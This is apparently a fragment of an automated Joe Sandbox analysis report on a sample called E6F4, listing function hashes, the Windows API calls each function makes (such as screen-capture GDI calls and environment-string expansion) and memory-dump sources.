                                                                                                                                                                                                                                • Instruction ID: 0f499622cc0f3c43b3555f4377fb4a79439ec560ce197abdb9c9467c7f5e14b0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC31C9B45093448FC710DF29C85162FBBE2FFC2354F44982CE5864B620EB799946CB42
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 005B6BF0
                                                                                                                                                                                                                                • GetCurrentObject.GDI32(00000000,00000007), ref: 005B6C11
                                                                                                                                                                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 005B6C21
                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 005B6C28
                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 005B6C37
                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 005B6C42
                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 005B6C4E
                                                                                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 005B6C71
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelect
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2843486406-0
                                                                                                                                                                                                                                • Opcode ID: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
                                                                                                                                                                                                                                • Instruction ID: 82349f27f789fe1967b008fc9a04c798819ba7c072fc6f3af324da21c8e5f00e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68214FB9504310EFE3509F609C49B2B7BF8FB8AB11F014929FA59E2290D7749C048B67
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 005A5411
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                • String ID: +$e$+$e$XY$E#G
                                                                                                                                                                                                                                • API String ID: 237503144-1023387988
                                                                                                                                                                                                                                • Opcode ID: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
                                                                                                                                                                                                                                • Instruction ID: 489d57a4cd2cae426e7aea3951b0fc72d80b38afc99b2aa50e560a7be7c62aad
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A721F73424C344AFD3148F65D88175FBBE0FBC6714F25C92DE5A857282D775C80A8B86
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 005A5B5B
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                • String ID: B"@$`J/H$rp
                                                                                                                                                                                                                                • API String ID: 237503144-3817236508
                                                                                                                                                                                                                                • Opcode ID: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
                                                                                                                                                                                                                                • Instruction ID: f6e6e798599f7b5a87b5228b09bdb70562a5a789b90b9ac5217ff28b2d60377f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6831CDB0E443489FDB10CFA9D8827DEBBB2EF45700F10012CE441BB295E6B55906CFA9
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                • String ID: aN@$Wu
                                                                                                                                                                                                                                • API String ID: 3664257935-2510175649
                                                                                                                                                                                                                                • Opcode ID: 6923c55db78119380e5fe35a3321c238481177c04641367e3fdf37507d6e1cbb
                                                                                                                                                                                                                                • Instruction ID: fb7b49653fcfe6187a11668ca7033b53e8d7d933bb39412ee55706a61e0bd157
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6923c55db78119380e5fe35a3321c238481177c04641367e3fdf37507d6e1cbb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5951777460C3C08BE3358B299C557ABBFE29FE2308F48096DE0D95B3D2DA74440AC75A
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                • String ID: Wu
                                                                                                                                                                                                                                • API String ID: 3664257935-4083010176
                                                                                                                                                                                                                                • Opcode ID: 880272bc0811b14ab5181b2bf88990afbeca93da92f698920aa63cdcc06e2724
                                                                                                                                                                                                                                • Instruction ID: 76f8199259777ce60f51c6d99c718f1815bb22ab62b72bec75753df54c08d8dc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 880272bc0811b14ab5181b2bf88990afbeca93da92f698920aa63cdcc06e2724
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2C0023B8620009BDE857FA0FD898187A31FB4A30531C44B4B80140036DAA20960AA59